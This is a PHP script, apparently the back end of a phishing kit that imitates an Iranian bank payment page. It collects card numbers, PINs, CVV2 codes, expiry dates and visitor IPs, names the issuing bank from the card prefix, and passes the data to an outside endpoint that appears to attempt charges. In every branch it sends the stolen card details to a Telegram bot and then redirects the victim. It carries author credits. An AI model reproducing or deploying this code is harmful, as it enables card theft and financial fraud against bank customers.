<?php


if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) {
$protocol = $_SERVER['SERVER_PROTOCOL'];
if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0' ) ) ) {
$protocol = 'HTTP/1.0';
}

header( 'Allow: POST' );
header( "$protocol 405 Method Not Allowed" );
header( 'Content-Type: text/plain' );
exit;
}

include "info.php";


$captcha = $_POST["captcha"];
$refid = $_POST["refid"];
$pan = $_POST["pan"];
$pin = $_POST["pin"];
$cvv = $_POST["cvv2"];
$year = $_POST["inputyear"];
$month = $_POST["inputmonth"];
if(isset($_POST["inputemail"])){
    $email = $_POST["inputemail"];
}else{
    $email = "None";
}

$pan1 = substr($pan,0,4);
$pan2 = substr($pan,4,-8);
$pan3 = substr($pan,8,-4);
$pan4 = substr($pan,12);
$cardn = substr($pan,0,-10);
$trim = str_replace(" ", "", $pan);
$CartStart = substr($pan, 0, -12);

if($CartStart == "6037 99" || $CartStart == "1700 19" || $CartStart == "5899 05"){ $bankname = "ملی"; }else{
if($CartStart == "5892 10"){ $bankname = "سپه"; }else{
if($CartStart == "6276 48" || $CartStart == "2071 77"){$bankname = "توسعه_صادرات"; }else{
if($CartStart == "6279 61"){$bankname = "صنعت_معدن"; }else{
if($CartStart == "6037 70" || $CartStart == "6392 17"){$bankname = "کشاورزی"; }else{
if($CartStart == "6280 23"){$bankname = "مسکن"; }else{
if($CartStart == "6277 60"){$bankname = "پست_بانک"; }else{
if($CartStart == "5029 08"){$bankname = "تعاون"; }else{
if($CartStart == "6274 12"){$bankname = "اقتصاد_نوین"; }else{
if($CartStart == "6221 06" || $CartStart == "6399 94" || $CartStart == "6278 84"){$bankname = "پارسیان"; }else{
if($CartStart == "5022 29" || $CartStart == "6393 47"){$bankname = "پاسارگاد"; }else{
if($CartStart == "6274 88" || $CartStart == "5029 10"){$bankname = "کارآفرین"; }else{
if($CartStart == "6219 86"){$bankname = "سامان"; }else{
if($CartStart == "6393 46"){$bankname = "سینا"; }else{
if($CartStart == "6396 07"){$bankname = "سرمایه"; }else{
if($CartStart == "6362 14"){$bankname = "آینده"; }else{
if($CartStart == "5028 06" || $CartStart == "5047 06"){$bankname = "شهر"; }else{
if($CartStart == "5029 38"){$bankname = "دی"; }else{
if($CartStart == "6037 69"){$bankname = "صادرات"; }else{
if($CartStart == "6104 33" || $CartStart == "9919 75"){$bankname = "ملت"; }else{
if($CartStart == "6273 53" || $CartStart == "5859 83"){$bankname = "تجارت"; }else{
if($CartStart == "5894 63"){$bankname = "رفاه"; }else{
if($CartStart == "6273 81"){$bankname = "انصار"; }else{
if($CartStart == "5057 85"){$bankname = "ایران_زمین"; }else{
if($CartStart == "6367 95"){$bankname = "مرکزی"; }else{
if($CartStart == "6369 49"){$bankname = "حکمت"; }else{
if($CartStart == "5054 16"){$bankname = "گردشگری"; }else{
if($CartStart == "6063 73"){$bankname = "قرض_الحسنه"; }else{
if($CartStart == "6281 57"){$bankname = "موسسه_اعتباری"; }else{
if($CartStart == "5058 01"){$bankname = "کوثر"; }else{
if($CartStart == "6393 70"){$bankname = "موسسه_مهر"; }else{
if($CartStart == "6395 99"){ $bankname = "قوامین"; }else{
	$bankname = "نامعلوم";
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
$ip = $_SERVER["REMOTE_ADDR"];

$pay_g = file_get_contents("$API/pay.php?refid=$refid&pan=$trim&pin=$pin&cvv2=$cvv&month=$month&year=$year&captcha=$captcha");
$getcodech = json_decode($pay_g);
$status = $getcodech->status;
if($status == "true"){
	$codes = $getcodech->charges;
	$t = "";
    $vvvv = 0;
    foreach($codes as $code){
    	$t .= "<code>$code</code>";
    	if($vvvv < count($codes)-1){
    		$t .= "\n";
    	}
    	$vvvv++;
    }
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@black_Widm
➖➖➖
<b>Codedby <a href='t.me/black_Widm'>black wid</a> </b>
";
	file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
	header("Location: s.php");
	
}
elseif($status == "invalid_captcha"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@black_Widm
➖➖➖
<b>Codedby <a href='t.me/black_Widm'>Black wid</a> </b>
";
	file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
	header("Location: s.php");
}
elseif($status == "invalid_card"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@black_Widm
➖➖➖
<b>Codedby <a href='t.me/black_Widm'>Black wid</a> </b>
";
	file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
	header("Location: s.php");
}
elseif($status == "limited"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@KirBeKosNanat
➖➖➖
<b>Codedby <a href='t.me/Clon4er'>ARMXAN</a> </b>
";
	file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
	header("Location: s.php");
}
elseif($status == "invalid_data"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@KirBeKosNanat
➖➖➖
<b>Codedby <a href='t.me/Clon4er'>ARMXAN</a> </b>
";
    file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
    header("Location: s.php");
}
elseif($status == "not_amount"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@KirBeKosNanat
➖➖➖
<b>Codedby <a href='t.me/Clon4er'>ARMXAN</a> </b>
";
	file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
    header("Location: s.php");			
}
elseif($status == "not_order"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@KirBeKosNanat
➖➖➖
<b>Codedby <a href='t.me/Clon4er'>ARMXAN</a> </b>
";
    file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
    header("Location: s.php");	
}
elseif($status == "false"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@KirBeKosNanat
➖➖➖
<b>Codedby <a href='t.me/Clon4er'>ARMXAN</a> </b>
";
	file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));	
	header("Location: s.php");
}
elseif($status == "sale_failed"){
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@KirBeKosNanat
➖➖➖
<b>Codedby <a href='t.me/Clon4er'>ARMXAN</a> </b>
";
	file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));	
	header("Location: s.php");
}
else{
	$Text = "
• New $bankname Sended :) 
➖➖➖
• CardNumber : <code>$trim</code>
• Pincode : <code>$pin</code>
• Cvv2 : <code>$cvv</code>
• DATE :  <code>$year</code>/ <code>$month</code>
• IP : <code>$ip</code>
@KirBeKosNanat
➖➖➖
<b>Codedby <a href='t.me/Clon4er'>ARMXAN</a> </b>
";
    file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));
    header("Location: s.php");
}
    
?>